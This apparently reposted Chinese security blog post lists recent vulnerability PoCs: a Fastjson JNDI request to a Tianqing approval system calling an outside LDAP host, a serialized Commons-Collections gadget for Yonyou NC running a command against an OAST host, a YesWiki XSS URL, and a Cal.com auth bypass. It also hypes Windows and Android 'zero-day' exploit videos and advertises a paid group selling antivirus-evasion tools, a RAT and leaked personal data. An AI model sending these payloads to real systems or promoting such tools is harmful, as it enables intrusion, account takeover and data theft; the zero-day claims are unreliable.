文章总结： 文档披露了多个近期0day与漏洞POC，包括天绿盾Fastjson反序列化、用友NC反序列化、YesWikiXSS及Cal.com权限绕过。此外展示了声称通杀Windows和Android系统的高危RCE漏洞利用视频，并在文末推广付费知识星球以获取免杀工具及漏洞复现资源。 综合评分： 65 文章分类： 漏洞POC,漏洞分析,WEB安全,移动安全,软文广告

---

近期0day+POC|Windows RCE 0day漏洞利用|最后一个宣称通杀Android12–16

原创

渗透测试 渗透测试

渗透测试

2026年1月19日 18:01 中国香港

点击上方蓝字关注【渗透测试】不迷路

免责声明：本文所涉及的技术、工具及方法仅限用于合法授权的学习、研究目的。使用者应知悉并同意，任何滥用行为所引发的一切后果均由其自行承担，本公众号概不负责。

1、天*绿盾审批系统 editConfigVal 接口 Fastjson 反序列化远程代码执行

描述：

Fastjson 反序列化漏洞：Fastjson 是一个高效的 Java JSON 库。在特定版本中，为了提供灵活性，它支持在反序列化过程中通过@type 属性指定任意可用的 Java 类。攻击者可以构造一个恶意的 JSON 字符串，其中 @type 指向一个包含危险方法（如构造函数、getter/setter）的类（例如 com.sun.rowset.JdbcRowSetImpl）。

利用链：当 Fastjson 反序列化这个恶意 JSON 时，会实例化指定的类并执行其一系列的 setter 或 getter 方法。通过精心构造的利用链（如 JNDI 注入），攻击者可以诱使应用程序连接到恶意的 LDAP/RMI 服务器，并加载执行远程的恶意 Java 代码。

接口：editConfigVal 接口通常用于修改系统配置值。如果该接口接收 JSON 格式的参数，并且直接使用存在漏洞的 Fastjson 版本进行反序列化，而没有做任何安全过滤，那么攻击者向这个接口发送恶意构造的 JSON 数据包，就可以触发漏洞。

POC：

POST /trwfe/login.jsp/.%2e/rest/conf/editConfigVal HTTP/1.1Host: Content-Type: application/json{    "@type": "com.sun.rowset.JdbcRowSetImpl",    "dataSourceName": "ldap://gobygo.net/A4",    "autoCommit": true}

2、*友NC UserSynchronizationServlet 反序列化漏洞

POC：

POST /servlet/UserSynchronizationServlet?pageId=login HTTP/1.1Host: Accept-Encoding: gzipConnection: keep-aliveContent-Length: 1355User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36X-Originating-Ip: [REDACTED]X-Remote-Addr: [REDACTED]X-Remote-Ip: [REDACTED]
��srjava.util.HashSet�D�����[email protected]��қ9��LkeytLjava/lang/Object;LmaptLjava/util/Map;xpt&https://github.com/joaomatosf/jexboss sr*org.apache.commons.collections.map.LazyMapn唂�y�Lfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0Ǘ�(z�[iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;�V*��4�xpsr;org.apache.commons.collections.functors.ConstantTransformerXv�A��L    iConstantq~xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformer���k{|�8[iArgst[Ljava/lang/Object;LiMethodNametLjava/lang/String;[iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;��X�s)lxptgetRuntimeur[Ljava.lang.Class;�׮��Z�xpt getMethoduq~vrjava.lang.String���8z;�Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~ur[Ljava.lang.String;��V��{Gxpt/ping d3i6c3plt95kfs63s15gp7ihb7adw9xu1.oast.protexecuq~q~ sq~srjava.lang.Integer⠤���8Ivaluexrjava.lang.Number������xpsrjava.util.HashMap���`�FloadFactorI thresholdxp?@wxxx

3、CVE-2025-46549: YesWiki <= 4.5.1 – Cross-Site Scripting

描述：YesWiki 4.5.1 及更早版本中存在反射型跨站脚本漏洞，该漏洞源于对用户输入的数据净化不足。攻击者可诱骗用户点击恶意链接，从而窃取其Cookie并劫持会话。

POC：

GET /?BazaR/bazariframe&id=2&template=%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1Host: {{Hostname}}

4、Cal.com /api/auth/session 权限绕过漏洞（CVE-2026-23478）

在 Cal.com 3.1.6 至 6.0.7 版本中，其自定义 NextAuth JWT 回调逻辑存在身份认证绕过漏洞。攻击者可通过调用 session.update() 方法并构造目标用户的邮箱地址，直接获取该用户的完整登录会话权限，进而实现账户接管。

5、Windows RCE 0day漏洞利用

✅漏洞类型：SMBGhost（SMBv3 远程代码执行）⭕️ 利用方式：零点击（ZeroClick）👉 可通过公网IP远程执行，无需用户交互、影响最新版Windows系统、攻击者可获得系统级完全控制权限✅已测试系统：Windows 10、11Windows Server 2019、2022、2025

已关注

关注

重播 分享 赞

关闭

观看更多

更多

退出全屏

切换到竖屏全屏退出全屏

渗透测试已关注

分享视频

，时长06:32

0/0

00:00/06:32

切换到横屏模式

继续播放

[ ]

进度条，百分之0

播放

00:00

/

06:32

06:32

倍速

全屏

倍速播放中

0.5倍 0.75倍 1.0倍 1.5倍 2.0倍

超清 流畅

继续观看

近期0day+POC|Windows RCE 0day漏洞利用|最后一个宣称通杀Android12–16

观看更多

转载

,

近期0day+POC|Windows RCE 0day漏洞利用|最后一个宣称通杀Android12–16

渗透测试已关注

分享点赞在看

已同步到看一看写下你的评论

视频详情

该视频信息源自公开网络渠道。

6、Android 0day漏洞+POC演示

2026年1月16日，暗网监测发现一条涉及Android 0day漏洞及完整漏洞利用链的售卖信息，最初出现在Telegram的某个频道中。随后，相关内容被迅速转发至多个地下技术论坛及其他Telegram渠道，并附带一段漏洞利用的概念验证（PoC）演示视频，用以佐证其宣称的攻击能力。其中，完整的Android漏洞利用源代码标价高达450万美元；单独出售的漏洞利用shellcode标价为40万美元，堪称天价。此外，攻击者还提供目标植入服务，其定价亦相当高昂。

已关注

关注

重播 分享 赞

关闭

观看更多

更多

退出全屏

切换到竖屏全屏退出全屏

渗透测试已关注

分享视频

，时长02:57

0/0

00:00/02:57

切换到横屏模式

继续播放

[ ]

进度条，百分之0

播放

00:00

/

02:57

02:57

倍速

全屏

倍速播放中

0.5倍 0.75倍 1.0倍 1.5倍 2.0倍

超清 流畅

继续观看

近期0day+POC|Windows RCE 0day漏洞利用|最后一个宣称通杀Android12–16

观看更多

转载

,

近期0day+POC|Windows RCE 0day漏洞利用|最后一个宣称通杀Android12–16

渗透测试已关注

分享点赞在看

已同步到看一看写下你的评论

视频详情

该视频信息源自公开网络渠道。

✅使用反馈

🎁获取方式(加入付费星球)

客服支持 💬：24小时在线解答，不怕有问题！

💎终身使用权：购买即可获得星球所有工具的永久使用权，终身使用所有工具及未来升级版本。

🖥️ 多设备支持：所有工具采用一机一码授权，支持多台自用电脑激活，灵活无忧。

🏆一次购买，终身受益！享受无忧售后服务、技术支持与永久更新

星球介绍

自研工具、二开工具、免杀工具、漏洞复现、教程等资源、漏洞挖掘分析、网络安全相关资料分享。

【免杀C2工具】PC端跨平台远程管理 ShadowRAT分析 | 汉化版附下载

【Ai渗透神器】AiScan‑N Ai自动渗透测试 | 助力CTF网络安全大赛，开启智能防护新篇章

本地离线大模型DeepSeek‑R‑14B&Qwen3+ AiScan‑N助力CTF网络安全大赛|内网快速扫描，无需访问互联网！

用Ai做自动化渗透测试对CTF题目进行解密|CTF网络安全大赛

【神兵利器】Ai全自动化渗透测试工具 | AiScan-N带你开启智能安全的新时代！

社工裤子 | 美国佬天塌了~

AiScan-N 不止于此！一款基于人工智能驱动的Ai自动化网络安全（运维）工具【CLI Agent】

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：渗透测试 渗透测试 渗透测试《近期0day+POC|Windows RCE 0day漏洞利用|最后一个宣称通杀Android12–16》